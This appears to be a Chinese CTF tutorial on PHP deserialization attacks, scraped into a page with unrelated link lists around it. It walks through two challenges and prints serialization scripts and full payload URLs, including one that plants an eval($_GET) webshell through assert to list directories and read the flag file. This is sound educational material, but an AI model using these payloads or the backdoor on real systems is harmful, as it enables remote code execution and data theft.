当前位置: 首页 > news >正文

华建河北住房和城乡建设厅网站wordpress三栏cms主题

华建河北住房和城乡建设厅网站,wordpress三栏cms主题,优化大师的功能有哪些,seo工具箱作者#xff1a;Eason_LYC 悲观者预言失败#xff0c;十言九中。 乐观者创造奇迹#xff0c;一次即可。 一个人的价值#xff0c;在于他所拥有的。可以不学无术#xff0c;但不能一无所有#xff01; 技术领域#xff1a;WEB安全、网络攻防 关注WEB安全、网络攻防。我的… 作者Eason_LYC 悲观者预言失败十言九中。 乐观者创造奇迹一次即可。 一个人的价值在于他所拥有的。可以不学无术但不能一无所有 技术领域WEB安全、网络攻防 关注WEB安全、网络攻防。我的专栏文章知识点全面细致逻辑清晰、结合实战让你在学习路上事半功倍少走弯路 个人社区极乐世界-技术至上 追求技术至上这是我们理想中的极乐世界~关注我即可加入社区 本专栏CTF基础入门系列打破以往CTF速成或就题论题模式。采用系统讲解基础知识入门题目练习真题讲解方式。让刚接触CTF的读者真正掌握CTF中各类型知识点为后续自学或快速刷题备赛打下坚实的基础~ 目前ctf比赛一般选择php作为首选语言如读者不了解php的基本语法请登录相关网站自学下基本语法即可一般5-7天即可掌握基础。 目录 1. 题目环境搭建2. 魔法函数的危险操作2.1 题目demo.php2.2 [NPUCTF2020]ReadlezPHP 1. 题目环境搭建 详见我的一篇文章phpstudy本地环境搭建图文教程 搭建成功后在网站根目录新建含有原始代码的php文件通过浏览器访问即可。 网站根目录中新建一个名为flag.php的文件内容自定可作为flag使用。 ?php echo flag{You_Gor_It_Great!}; ?在线运行php网站推荐PHP 在线工具 | 菜鸟工具或者在线运行PHP 2. 魔法函数的危险操作 反序列化时会将序列化字符串重新还原为对象在这个过程中会⾃动去调⽤类中的魔术⽅法⽐如 __wakeup() 、 __destruct() 等如果这些魔术⽅法中存在⼀些危险操作如读取⽂件、执⾏系统命令等。攻击 者可以通过构造对象中的变量值在触发魔术⽅法时执⾏这些危险操作。 __destruct() // 析构函数在销毁对象时调用 __wakeup() // 执行unserialize()时先会调用这个函数2.1 题目demo.php 题目源码 ?php // flag is in flag.php class demo {private $filename demo.php;public function __wakeup(){// TODO: Implement __wakeup() method.$this-show($this-filename);}public function show($filename){show_source($filename);} } unserialize($_GET[s]); $d new demo(); $d-show(demo.php); ?打开题目 解题思路 源码分析发现 a. 存在魔法函数__wakeup b. 魔法函数中调用show函数里面存在危险操作show_source显示源码 c. 参数filename可控 综上可尝试反序列化读取flag.php构造反序列化 调用链__wakeup() show 上⾯的代码是接收⼀个参数 s 然后将其反序列化反序列化后会调⽤ __wakeup() ⽅法。如果⼀切正常的话 这个⽅法会显示⼀下 demo.php ⽂件的源代码。但是参数 s 是可控的也就是说对象 s 的属性是可控的。于是我们可以伪造⼀个 filename 来构造对象(flag.php) 使用PHP 在线工具 | 菜鸟工具生成payload ?php class demo{private $filename flag.php; }$a new demo(); $b serialize($a); echo $b.br; echo urlencode($b); ?// 结果如下 // O:4:demo:1:{s:14:demofilename;s:8:flag.php;} // O%3A4%3A%22demo%22%3A1%3A%7Bs%3A14%3A%22%00demo%00filename%22%3Bs%3A8%3A%22flag.php%22%3B%7D最终攻击payload浏览器url栏中输入如下内容 http://ip:port/filename/?sO%3A4%3A%22demo%22%3A1%3A%7Bs%3A14%3A%22%00demo%00filename%22%3Bs%3A8%3A%22flag.php%22%3B%7D 2.2 [NPUCTF2020]ReadlezPHP 题目链接[NPUCTF2020]ReadlezPHP]ReadlezPHP 题目 正常的一个报时网页 此题可有两个flag解题思路 打开网站尝试路径扫描无果。尝试查看网页源码发现可以链接 点击后URL中去掉view-source: 页面展示源码如下。 分析源代码可知 1存在魔法函数__destruct() 2调用危险代码动态执行 b ( b( b(a) 3$a $b参数可控 综上选定PHP反序列化攻击构造序列化脚本 ?phpclass HelloPhp {public $als /;public $bsystem; }$t new HelloPhp(); $s serialize($t); echo $s.br; echo urlencode($s); ?// 输出结果 // O:8:HelloPhp:2:{s:1:a;s:4:ls /;s:1:b;s:6:system;} // O%3A8%3A%22HelloPhp%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A4%3A%22ls%2F%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22system%22%3B%7D攻击payload为 http://efc030c7-ad55-4224-a276-9dcd7d01e537.node4.buuoj.cn:81/time.php?dataO%3A8%3A%22HelloPhp%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A4%3A%22ls%2F%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22system%22%3B%7D 但是没有响应怀疑是过滤了部分函数。尝试使用别的函数如assert ?php class HelloPhp {public $aphpinfo();public $bassert; }$t new HelloPhp(); $s serialize($t); echo $s.br; echo urlencode($s);?// 输出结果 // O:8:HelloPhp:2:{s:1:a;s:9:phpinfo();s:1:b;s:6:assert;} // O%3A8%3A%22HelloPhp%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A9%3A%22phpinfo%28%29%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22assert%22%3B%7D攻击payload http://efc030c7-ad55-4224-a276-9dcd7d01e537.node4.buuoj.cn:81/time.php?dataO%3A8%3A%22HelloPhp%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A9%3A%22phpinfo%28%29%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22assert%22%3B%7D 成功查看被禁用函数disable_functions PHP中的system函数被禁用 搜索flag找到第一个flag 构造后门文件查看是否还有其他flag assert(eval($_GET[1234])) ?phpclass HelloPhp {public $aeval(\$_GET[1234]);public $bassert; }$t new HelloPhp(); $s serialize($t); echo $s.br; echo urlencode($s); ?攻击payload http://efc030c7-ad55-4224-a276-9dcd7d01e537.node4.buuoj.cn:81/time.php?dataO%3A8%3A%22HelloPhp%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A17%3A%22eval%28%24_GET%5B1234%5D%29%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22assert%22%3B%7D1234var_dump(scandir(/)); 后门1234的命令被限制使用var_dump(scandir(“/”))代替 system(“ls /”) 找到第二个flag http://efc030c7-ad55-4224-a276-9dcd7d01e537.node4.buuoj.cn:81/time.php?dataO%3A8%3A%22HelloPhp%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A17%3A%22eval%28%24_GET%5B1234%5D%29%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22assert%22%3B%7D1234var_dump(scandir(/)); 使用echo file_get_contents(“/FIag_!S_it”)代替system(cat /FIag_!S_it) http://efc030c7-ad55-4224-a276-9dcd7d01e537.node4.buuoj.cn:81/time.php?dataO%3A8%3A%22HelloPhp%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A17%3A%22eval%28%24_GET%5B1234%5D%29%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22assert%22%3B%7D1234echo file_get_contents(/FIag_!S_it); 找到第二个flag NPUCTF{this_is_not_a_fake_flag_but_true_flag} 以上仅是典型题目下一篇文章将继续介绍php反序列化pop链的构造
http://www.w-s-a.com/news/630945/

相关文章:

  • 网站开发步骤规划蓝天云免费空间主机
  • 网站字体规范wordpress找不到页面内容编辑
  • 静态网站建设参考文献茂名营销型网站制作公司
  • 君山区建设局网站风铃微网站怎么做
  • 购物网站销售管理合肥网络推广平台
  • 网站建设规划书txt微盘注册帐号
  • 小说网站开发实训报告企业网盘收费标准
  • mvc网站开发医疗医院网站建设
  • 天津市建设厅官方网站wordpress设置404
  • 贵阳好的网站建设免费正能量网站下载ww
  • 免费学习的网站平台自建站seo如何做
  • 海南三亚做网站公众号版面设计创意
  • 学校网站建设目的与意义合肥网页定制
  • 网站查询地址网站建设与维护费用
  • 做网站哪些软件比较好合肥外贸网站建设公司
  • 建网站需要哪些条件专业网站设计报价
  • 定制网站开发技术化妆品的网站布局设计图片大全
  • 网站模糊设计发布产品的免费平台有哪些
  • 网站建站什么目录桂林网站建设内容
  • 光明新区城市建设局网站长沙营销型网站制作费用
  • 网站建设制度制定wordpress主题哥
  • 门户网站的种类php网站开发实训心得
  • 流程图制作网页网络优化seo
  • 个人公益网站怎么制作wordpress flat theme
  • 做营销型网站的公司篇高端网站愿建设
  • 五莲网站建设维护推广凡科做网站的方法
  • 山东省住房建设厅网站首页网站文章更新怎么通知搜索引擎
  • 商务网站的可行性分析包括大流量网站 优化
  • 推广网站有效的方法网站数据统计
  • 自建视频网站WordPress数据库添加管理员